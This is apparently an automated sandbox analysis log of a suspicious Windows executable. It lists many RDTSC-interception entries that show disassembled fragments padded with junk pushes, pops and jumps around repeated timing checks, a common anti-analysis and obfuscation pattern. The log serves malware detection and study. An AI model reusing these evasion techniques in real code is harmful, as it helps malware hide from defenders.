Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBE7A second address: 7EBE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBE83 second address: 7EBE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EC0F7 second address: 7EC106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B3885AF0Ah 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EC106 second address: 7EC10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EC10C second address: 7EC110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EC110 second address: 7EC114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F297A second address: 7F297E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F297E second address: 7F2994 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F6B38DFD06Eh 0x0000000e push esi 0x0000000f pop esi 0x00000010 jng 00007F6B38DFD066h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F2994 second address: 7F29B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F6B3885AF06h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6B3885AF0Fh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1A34 second address: 7F1A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD06Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1A48 second address: 7F1A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1A4E second address: 7F1A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1A52 second address: 7F1A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6B3885AF0Bh 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 js 00007F6B3885AF06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1A70 second address: 7F1A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6B38DFD075h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1A90 second address: 7F1AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6B3885AF06h 0x0000000a pushad 0x0000000b popad 0x0000000c jl 00007F6B3885AF06h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1AA3 second address: 7F1AAF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6B38DFD06Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F23FC second address: 7F241E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jo 00007F6B3885AF06h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F241E second address: 7F2424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FAC42 second address: 7FAC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FAC52 second address: 7FAC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FAC56 second address: 7FAC66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F6B3885AF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FAC66 second address: 7FAC70 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6B38DFD06Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B690E second address: 7B69AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F6B3885AF15h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F6B3885AF08h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b nop 0x0000001c sub dword ptr [ebp+122D3465h], ecx 0x00000022 lea eax, dword ptr [ebp+124886E1h] 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F6B3885AF08h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007F6B3885AF19h 0x00000049 jmp 00007F6B3885AF0Eh 0x0000004e popad 0x0000004f push eax 0x00000050 js 00007F6B3885AF14h 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6A4B second address: 7B6A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6B79 second address: 7B6B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6B7F second address: 7B6B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6B83 second address: 7B6B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6DE4 second address: 7B6DF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6DF3 second address: 7B6DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6DF7 second address: 7B6DFD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B70F1 second address: 7B710C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B3885AF17h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B745E second address: 7B7487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B38DFD06Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7487 second address: 7B74E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1247ECABh], edx 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F6B3885AF08h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jo 00007F6B3885AF0Ch 0x00000033 or edi, 7B06A002h 0x00000039 nop 0x0000003a push eax 0x0000003b push edx 0x0000003c je 00007F6B3885AF0Ch 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B74E6 second address: 7B74EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7D52 second address: 7B7D57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7D57 second address: 79CC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F6B38DFD068h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call dword ptr [ebp+122D2D57h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6B38DFD06Bh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7727F8 second address: 7727FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7727FD second address: 77281E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6B38DFD066h 0x00000009 jne 00007F6B38DFD066h 0x0000000f jp 00007F6B38DFD066h 0x00000015 popad 0x00000016 pushad 0x00000017 jnc 00007F6B38DFD066h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEECD second address: 7FEEE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B3885AF14h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEEE7 second address: 7FEEEC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF70D second address: 7FF72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6B3885AF16h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF72F second address: 7FF740 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 je 00007F6B38DFD066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFA0E second address: 7FFA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B3885AF0Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFA1F second address: 7FFA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007F6B38DFD066h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFE6C second address: 7FFE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B3885AF0Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFE7E second address: 7FFE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8002D3 second address: 80030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F6B3885AF08h 0x0000000b push ebx 0x0000000c jmp 00007F6B3885AF12h 0x00000011 pop ebx 0x00000012 jo 00007F6B3885AF11h 0x00000018 jmp 00007F6B3885AF0Bh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80030D second address: 80032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6B38DFD066h 0x0000000a popad 0x0000000b jo 00007F6B38DFD077h 0x00000011 jmp 00007F6B38DFD071h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80032F second address: 800339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6B3885AF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEC1A second address: 7FEC37 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6B38DFD073h 0x00000008 jmp 00007F6B38DFD06Dh 0x0000000d jl 00007F6B38DFD072h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEC37 second address: 7FEC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80352D second address: 803543 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F6B38DFD066h 0x0000000f jg 00007F6B38DFD066h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8056F8 second address: 8056FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 808894 second address: 808899 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80845C second address: 808479 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push esi 0x00000009 jmp 00007F6B3885AF12h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8085FA second address: 8085FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8085FE second address: 80861E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F6B3885AF06h 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007F6B3885AF11h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80D941 second address: 80D95D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80D95D second address: 80D961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80D961 second address: 80D965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DC23 second address: 80DC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DC2B second address: 80DC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DD7C second address: 80DD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DD80 second address: 80DD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E01B second address: 80E021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7726 second address: 7B772F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B772F second address: 7B7789 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6B3885AF0Ch 0x0000000d nop 0x0000000e mov di, 6F14h 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F6B3885AF08h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push edi 0x0000002f movzx edx, dx 0x00000032 pop edx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F6B3885AF12h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7789 second address: 7B779A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F6B38DFD066h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 811E51 second address: 811E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 811E55 second address: 811E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81189B second address: 8118A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B3885AF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8118A5 second address: 8118B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F6B38DFD066h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8118B7 second address: 8118C7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F6B3885AF06h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8118C7 second address: 811907 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F6B38DFD066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F6B38DFD071h 0x00000018 je 00007F6B38DFD066h 0x0000001e popad 0x0000001f jmp 00007F6B38DFD075h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 811907 second address: 811925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B3885AF18h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 811925 second address: 811929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 811929 second address: 81192D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81506A second address: 815081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD073h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 815081 second address: 81508D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81508D second address: 815091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8151CE second address: 8151D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8151D9 second address: 815206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6B38DFD079h 0x0000000e popad 0x0000000f push edi 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81573A second address: 81573E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81573E second address: 815756 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6B38DFD076h 0x0000000c jmp 00007F6B38DFD06Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81DC96 second address: 81DCAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF13h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81DCAD second address: 81DCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81DCB3 second address: 81DCBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6B3885AF06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81DCBE second address: 81DCD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jng 00007F6B38DFD093h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81DCD9 second address: 81DCF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81DCF7 second address: 81DCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BD6A second address: 81BD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
